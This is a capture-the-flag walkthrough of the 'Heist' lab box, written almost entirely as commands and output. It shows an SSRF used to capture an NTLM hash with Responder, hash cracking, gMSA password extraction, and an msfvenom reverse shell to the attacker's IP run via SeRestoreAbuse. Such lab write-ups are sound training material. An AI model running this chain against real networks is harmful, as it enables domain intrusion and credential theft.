Heist
Enumeration
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open http Werkzeug httpd 2.0.1 (Python 3.9.0)
| http-methods:
|_ Supported Methods: HEAD OPTIONS GET
|_http-title: Super Secure Web Browser
http://192.168.147.165:8080/?url=http://localhost:8080 - SSRF
# cd /usr/share/responder
# python3 Responder.py -I tun0 --lm -v
http://192.168.147.165:8080/?url=http%3A%2F%2F192.168.49.147%2F
[HTTP] Sending NTLM authentication request to 192.168.147.165
[HTTP] GET request from: 192.168.147.165 URL: /
[HTTP] Host : 192.168.49.147
[HTTP] NTLMv2 Client : 192.168.147.165
[HTTP] NTLMv2 Username : HEIST\enox
[HTTP] NTLMv2 Hash : enox::HEIST:[REDACTED]
NTLMv2 Hash -> hash.txt
$ john hash.txt
[REDACTED] (enox)
Initial Access
$ evil-winrm -u enox -p [REDACTED] -i 192.168.147.165
Lateral Movement
*Evil-WinRM* PS C:\Users\enox\Desktop> type todo.txt
- Setup Flask Application for Secure Browser [DONE]
- Use group managed service account for apache [DONE]
- Migrate to apache
svc_apache$ -> managed service account
*Evil-WinRM* PS C:\USers> net user enox
Global Group memberships *Web Admins *Domain Users
Enox account in the Web Admins group. May be, we have some power over the Apache account.
Group Managed Service Accounts (GMSA)
Group Managed Service Accounts provide a higher security option for non-interactive applications, services, processes, or tasks that run automatically but need a security credential.
These service accounts are given automatically-generated passwords. Given certain permissions, it is possible to retrieve these password hashes from Active Directory. To see what users or groups have permissions to do that for a given service account, we can look up the PrincipalsAllowedToRetrieveManagedPassword user property on the account.
https://github.com/CsEnox/tools/raw/main/GMSAPasswordReader.exe
*Evil-WinRM* PS C:\Users\enox\Desktop> upload GMSAPasswordReader.exe
*Evil-WinRM* PS C:\USers\enox\Documents> ./GMSAPasswordReader.exe --accountname svc_apache
Calculating hashes for Old Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : [REDACTED]
[*] aes128_cts_hmac_sha1 : [REDACTED]
[*] aes256_cts_hmac_sha1 : [REDACTED]
[*] des_cbc_md5 : [REDACTED]
Calculating hashes for Current Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : [REDACTED]
[*] aes128_cts_hmac_sha1 : [REDACTED]
[*] aes256_cts_hmac_sha1 : [REDACTED]
[*] des_cbc_md5 : [REDACTED]
Current Value -> rc4_hmac
$ evil-winrm -u 'svc_apache$' -H [REDACTED]-i 192.168.147.165
PrivEsc
SeRestorePrivilege - Enabled
https://github.com/dxnboy/redteam/blob/master/SeRestoreAbuse.exe
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> Invoke-WebRequest -Uri http://192.168.49.147/SeRestoreAbuse.exe -OutFile SeRestoreAbuse.exe
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.147 LPORT=80 -f exe -o shell.exe
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> Invoke-WebRequest -Uri http://192.168.49.147/shell.exe -OutFile shell.exe
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> .\SeRestoreAbuse.exe "cmd /c \Users\svc_apache$\Documents\shell.exe"
Last updated